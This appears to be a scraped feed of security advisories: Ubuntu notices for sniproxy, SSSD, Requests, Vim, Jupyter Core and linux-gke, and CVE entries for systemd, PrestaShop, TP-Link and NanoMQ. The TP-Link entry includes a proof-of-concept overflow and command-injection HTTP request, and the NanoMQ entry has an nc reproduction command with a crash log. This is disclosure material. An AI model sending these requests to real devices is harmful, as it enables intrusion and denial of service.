Ubuntu Security Notice 6148-1 - It was discovered that SNI Proxy did not properly handle wildcard backend hosts. An attacker could possibly use this issue to cause a buffer overflow, resulting in a denial of service, or arbitrary code execution.

=========================================================================  
Ubuntu Security Notice USN-6148-1  
June 12, 2023

sniproxy vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

SNI Proxy could be made to crash or run programs if it received specially  
crafted input.

Software Description:  
- sniproxy: Transparent TLS and HTTP layer 4 proxy with SNI support

Details:

It was discovered that SNI Proxy did not properly handle wildcard backend  
hosts. An attacker could possibly use this issue to cause a buffer overflow,  
resulting in a denial of service, or arbitrary code execution.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  sniproxy                        0.6.0-2ubuntu0.23.04.1

Ubuntu 22.10:  
  sniproxy                        0.6.0-2ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
  sniproxy                        0.6.0-2ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
  sniproxy                        0.6.0-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  sniproxy                        0.5.0-2ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6148-1  
  CVE-2023-25076

Package Information:  
  https://launchpad.net/ubuntu/+source/sniproxy/0.6.0-2ubuntu0.23.04.1  
  https://launchpad.net/ubuntu/+source/sniproxy/0.6.0-2ubuntu0.22.10.1  
  https://launchpad.net/ubuntu/+source/sniproxy/0.6.0-2ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/sniproxy/0.6.0-1ubuntu0.1

Ubuntu Security Notice USN-6148-1

Ubuntu Security Notice 6156-1 - It was discovered that SSSD incorrectly sanitized certificate data used in LDAP filters. When using this issue in combination with FreeIPA, a remote attacker could possibly use this issue to escalate privileges.

    ==========================================================================Ubuntu Security Notice USN-6156-1June 12, 2023sssd vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:SSSD could allow unintended access to network services.Software Description:- sssd: System Security Services DaemonDetails:It was discovered that SSSD incorrrectly sanitized certificate data used inLDAP filters. When using this issue in combination with FreeIPA, a remoteattacker could possibly use this issue to escalate privileges.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   sssd                            2.2.3-3ubuntu0.11In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6156-1   CVE-2022-4254Package Information:   https://launchpad.net/ubuntu/+source/sssd/2.2.3-3ubuntu0.11

Ubuntu Security Notice USN-6156-1

Ubuntu Security Notice 6155-1 - Dennis Brinkrolf and Tobias Funke discovered that Requests incorrectly leaked Proxy-Authorization headers. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6155-1  
June 12, 2023

requests vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Requests could be made to expose sensitive information over the network.

Software Description:  
- requests: elegant and simple HTTP library for Python

Details:

Dennis Brinkrolf and Tobias Funke discovered that Requests incorrectly  
leaked Proxy-Authorization headers. A remote attacker could possibly use  
this issue to obtain sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-requests                2.28.1+dfsg-1ubuntu1.1

Ubuntu 22.10:  
   python3-requests                2.27.1+dfsg-1ubuntu2.1

Ubuntu 22.04 LTS:  
   python3-requests                2.25.1+dfsg-2ubuntu0.1

Ubuntu 20.04 LTS:  
   python3-requests                2.22.0-2ubuntu1.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6155-1  
   CVE-2023-32681

Package Information:  
   https://launchpad.net/ubuntu/+source/requests/2.28.1+dfsg-1ubuntu1.1  
   https://launchpad.net/ubuntu/+source/requests/2.27.1+dfsg-1ubuntu2.1  
   https://launchpad.net/ubuntu/+source/requests/2.25.1+dfsg-2ubuntu0.1  
   https://launchpad.net/ubuntu/+source/requests/2.22.0-2ubuntu1.1

Ubuntu Security Notice USN-6155-1

Ubuntu Security Notice 6154-1 - It was discovered that Vim was using uninitialized memory when fuzzy matching, which could lead to invalid memory access. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. This issue only affected Ubuntu 22.04 LTS, Ubuntu 22.10 and Ubuntu 23.04. It was discovered that Vim was not properly performing bounds checks when processing register contents, which could lead to a NULL pointer dereference. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6154-1  
June 12, 2023

vim vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Vim.

Software Description:  
- vim: Vi IMproved - enhanced vi editor

Details:

It was discovered that Vim was using uninitialized memory when fuzzy  
matching, which could lead to invalid memory access. An attacker could  
possibly use this issue to cause a denial of service or execute arbitrary  
code. This issue only affected Ubuntu 22.04 LTS, Ubuntu 22.10 and Ubuntu  
23.04. (CVE-2023-2426)

It was discovered that Vim was not properly performing bounds checks when  
processing register contents, which could lead to a NULL pointer  
dereference. An attacker could possibly use this issue to cause a denial  
of service or execute arbitrary code. (CVE-2023-2609)

It was discovered that Vim was not properly limiting the length of  
substitution expression strings, which could lead to excessive memory  
consumption. An attacker could possibly use this issue to cause a denial  
of service. (CVE-2023-2610)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   vim                             2:9.0.1000-4ubuntu3.1  
   vim-tiny                        2:9.0.1000-4ubuntu3.1

Ubuntu 22.10:  
   vim                             2:9.0.0242-1ubuntu1.4  
   vim-tiny                        2:9.0.0242-1ubuntu1.4

Ubuntu 22.04 LTS:  
   vim                             2:8.2.3995-1ubuntu2.8  
   vim-tiny                        2:8.2.3995-1ubuntu2.8

Ubuntu 20.04 LTS:  
   vim                             2:8.1.2269-1ubuntu5.15  
   vim-tiny                        2:8.1.2269-1ubuntu5.15

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   vim                             2:8.0.1453-1ubuntu1.13+esm1  
   vim-tiny                        2:8.0.1453-1ubuntu1.13+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   vim                             2:7.4.1689-3ubuntu1.5+esm18  
   vim-tiny                        2:7.4.1689-3ubuntu1.5+esm18

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   vim                             2:7.4.052-1ubuntu3.1+esm10  
   vim-tiny                        2:7.4.052-1ubuntu3.1+esm10

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6154-1  
   CVE-2023-2426, CVE-2023-2609, CVE-2023-2610

Package Information:  
   https://launchpad.net/ubuntu/+source/vim/2:9.0.1000-4ubuntu3.1  
   https://launchpad.net/ubuntu/+source/vim/2:9.0.0242-1ubuntu1.4  
   https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.8  
   https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.15

Ubuntu Security Notice USN-6154-1

An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications.

CVE-2023-31439: Releases · systemd/systemd

TP-Link TL-WPA8630P (US)_ V2_ Version 171011 was discovered to contain a command injection vulnerability via the key parameter in the function sub_ 40A774.

Vulnerability introduction: Process the sub of admin/powerline in the httpd file\_ There is a command injection vulnerability in the 40A918 function (stack overflow can also be constructed). The key parameter in the function sub\_ 40A774 controlled by plc\_device is not filtered,but is directly executed by vsprintf splicing, resulting in command injection and stack overflow attack. Version: TL-WPA8630 KIT (US)\_ V2\_ Version 171011, and other versions of WPA, WR, WA and other power cat and repeater equipment.

Vulnerability static analysis  When processing web requests from/admin/powerline, run sub\_ 40A918 function  Accept the form field from the front end and judge when the form field value is plc\_ device execute sub\_40A774  Use this function to process the operation field, and execute sub when the field value is remove sub\_40A338  This function processes the value from the key field and directly splices the value into the sub\_ 4036A0 function  This function executes system commands  Directly splice the value of a1 to v6 through the insecure vsprintf function  The stack length of v6 is 0x804=2052, stack overflow will occur when the length of a1 exceeds 2052

    POST /admin/powerline HTTP/1.1
    Host: 192.168.100.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 63
    Origin: http://192.168.100.2
    Connection: close
    Referer: http://192.168.100.2/
    Cookie: Authorization=Basic%20admin%3A21232f297a57a5a743894a0e4a801fc3
    
    form=plc_device&operation=remove&key=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

 Directly splice the value of a1 to v6 through the insecure vsprintf function, and pass v6 into the function utils\_ exec\_ cmd  This function directly assigns a1 to v5, and executes commands through execvp, resulting in arbitrary command execution  getshell

CVE-2023-27837: IOT/TP-Link WPA8630P at main · lzd521/IOT

Prestashop winbizpayment <= 1.0.2 is vulnerable to Incorrect Access Control via modules/winbizpayment/downloads/download.php.

CVE-2023-30198: PrestaShop/Tools.php at 6c05518b807d014ee8edb811041e3de232520c28 · PrestaShop/PrestaShop

NanoMQ 0.17.5 is vulnerable to heap-buffer-overflow in the conn_handler function of mqtt_parser.c when it processes malformed messages.

**Describe the bug**  
We found a heap-buffer-overflow in conn_handler function of mqtt_parser.c when it processes malformed messages.

**Expected behavior**  
A clear and concise description of what you expected to happen.

**Actual Behavior**  
Heap-buffer-overflow

**To Reproduce**  
start nanomq with ./nanomq start  
Send the packet：nc 127.0.0.1 1883 < ./1181-poc.raw  
1181-poc.raw.zip

conn_handler function of mqtt_parser.c:602:20  

Asan Log

> \=================================================================  
> \==3700126==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000bb3c at pc 0x0000005f287d bp 0x7f8477d97950 sp 0x7f8477d97948  
> READ of size 1 at 0x60200000bb3c thread T7 (nng:task)  
> #0 0x5f287c in conn\_handler /home/user/nanomq/nng/src/sp/protocol/mqtt/mqtt\_parser.c:602:20  
> #1 0x816b7d in tcptran\_pipe\_nego\_cb /home/user/nanomq/nng/src/sp/transport/mqtt/broker\_tcp.c:363:13  
> #2 0x5b467b in nni\_taskq\_thread /home/user/nanomq/nng/src/core/taskq.c:50:4  
> #3 0x5b7d4c in nni\_thr\_wrap /home/user/nanomq/nng/src/core/thread.c:94:3  
> #4 0x5c78e0 in nni\_plat\_thr\_main /home/user/nanomq/nng/src/platform/posix/posix\_thread.c:266:2  
> #5 0x7f847ddb4608 in start\_thread /build/glibc-SzIz7B/glibc-2.31/nptl/pthread\_create.c:477:8  
> #6 0x7f847db40132 in clone /build/glibc-SzIz7B/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86\_64/clone.S:95
> 
> 0x60200000bb3c is located 0 bytes to the right of 12-byte region \[0x60200000bb30,0x60200000bb3c)  
> allocated by thread T7 (nng:task) here:  
> #0 0x4adf1d in malloc (/home/user/nanomq/build/nanomq/nanomq+0x4adf1d)  
> #1 0x81686e in tcptran\_pipe\_nego\_cb /home/user/nanomq/nng/src/sp/transport/mqtt/broker\_tcp.c:345:18  
> #2 0x5b467b in nni\_taskq\_thread /home/user/nanomq/nng/src/core/taskq.c:50:4  
> #3 0x5b7d4c in nni\_thr\_wrap /home/user/nanomq/nng/src/core/thread.c:94:3  
> #4 0x5c78e0 in nni\_plat\_thr\_main /home/user/nanomq/nng/src/platform/posix/posix\_thread.c:266:2  
> #5 0x7f847ddb4608 in start\_thread /build/glibc-SzIz7B/glibc-2.31/nptl/pthread\_create.c:477:8
> 
> Thread T7 (nng:task) created by T0 here:  
> #0 0x498cca in pthread\_create (/home/user/nanomq/build/nanomq/nanomq+0x498cca)  
> #1 0x5c766e in nni\_plat\_thr\_init /home/user/nanomq/nng/src/platform/posix/posix\_thread.c:279:7  
> #2 0x5b74de in nni\_thr\_init /home/user/nanomq/nng/src/core/thread.c:121:12  
> #3 0x5b3c6f in nni\_taskq\_init /home/user/nanomq/nng/src/core/taskq.c:95:8  
> #4 0x57bb04 in nni\_init\_helper /home/user/nanomq/nng/src/core/init.c:35:13  
> #5 0x5c7ef2 in nni\_plat\_init /home/user/nanomq/nng/src/platform/posix/posix\_thread.c:422:12  
> #6 0x61b6bd in nni\_proto\_mqtt\_open /home/user/nanomq/nng/src/sp/protocol.c:37:12  
> #7 0x544f4b in broker /home/user/nanomq/nanomq/apps/broker.c:871:25  
> #8 0x54ea34 in broker\_start /home/user/nanomq/nanomq/apps/broker.c:1602:7  
> #9 0x7f847da45082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
> 
> SUMMARY: AddressSanitizer: heap-buffer-overflow /home/user/nanomq/nng/src/sp/protocol/mqtt/mqtt\_parser.c:602:20 in conn\_handler  
> Shadow bytes around the buggy address:  
> 0x0c047fff9710: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa  
> 0x0c047fff9720: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa  
> 0x0c047fff9730: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fa  
> 0x0c047fff9740: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa  
> 0x0c047fff9750: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa  
> \=>0x0c047fff9760: fa fa fd fd fa fa 00\[04\]fa fa 00 01 fa fa fa fa  
> 0x0c047fff9770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
> 0x0c047fff9780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
> 0x0c047fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
> 0x0c047fff97a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
> 0x0c047fff97b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
> Shadow byte legend (one shadow byte represents 8 application bytes):  
> Addressable: 00  
> Partially addressable: 01 02 03 04 05 06 07  
> Heap left redzone: fa  
> Freed heap region: fd  
> Stack left redzone: f1  
> Stack mid redzone: f2  
> Stack right redzone: f3  
> Stack after return: f5  
> Stack use after scope: f8  
> Global redzone: f9  
> Global init order: f6  
> Poisoned by user: f7  
> Container overflow: fc  
> Array cookie: ac  
> Intra object redzone: bb  
> ASan internal: fe  
> Left alloca redzone: ca  
> Right alloca redzone: cb  
> Shadow gap: cc  
> \==3700126==ABORTING

\*\* Environment Details \*\*

*   NanoMQ version: 0.17.5 (da4d3c8)
*   Operating system and version: Ubuntu 20.04
*   Compiler and language used: gcc 9.4.0 clang 10.0.0
*   testing scenario: Run the broker(build with ASAN and TSAN) with the ./nanomq start command

CVE-2023-34488: [Security]: Vulnerability identified · Issue #1181 · emqx/nanomq

Ubuntu Security Notice 6153-1 - It was discovered that Jupyter Core executed untrusted files in the current working directory. An attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6153-1  
June 12, 2023

jupyter-core vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

Jupyter Core could be made to run programs as your login if it opened a  
specially crafted file.

Software Description:  
- jupyter-core: Core common functionality of Jupyter projects (tools)

Details:

It was discovered that Jupyter Core executed untrusted files in the current  
working directory. An attacker could possibly use this issue to execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   python3-jupyter-core            4.11.1-1ubuntu0.22.10.1

Ubuntu 22.04 LTS (Available with Ubuntu Pro):  
   python3-jupyter-core            4.9.1-1ubuntu0.1~esm1

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
   python3-jupyter-core            4.6.3-3ubuntu0.1~esm1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   python-jupyter-core             4.4.0-2ubuntu0.1~esm1  
   python3-jupyter-core            4.4.0-2ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6153-1  
   CVE-2022-39286

Package Information:  
   https://launchpad.net/ubuntu/+source/jupyter-core/4.11.1-1ubuntu0.22.10.1

Ubuntu Security Notice USN-6153-1

Ubuntu Security Notice 6152-1 - It was discovered that NFS client's access cache implementation in the Linux kernel caused a severe NFS performance degradation in certain conditions. This updated makes the NFS file-access stale cache behavior to be optional.

==========================================================================  
Ubuntu Security Notice USN-6152-1  
June 08, 2023

linux-gke regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

The system could suffer with performance degradation in certain conditions.

Software Description:  
- linux-gke: Linux kernel for Google Container Engine (GKE) systems

Details:

It was discovered that NFS client's access cache implementation in the  
Linux kernel caused a severe NFS performance degradation in certain  
conditions. This updated makes the NFS file-access stale cache behavior  
to be optional.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1035-gke     5.15.0-1035.40  
   linux-image-gke                 5.15.0.1035.34  
   linux-image-gke-5.15            5.15.0.1035.34

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1101-gke      5.4.0-1101.108  
   linux-image-gke                 5.4.0.1101.106  
   linux-image-gke-5.4             5.4.0.1101.106

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6152-1  
   https://launchpad.net/bugs/2022098

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1035.40  
   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1101.108

Tag

#ubuntu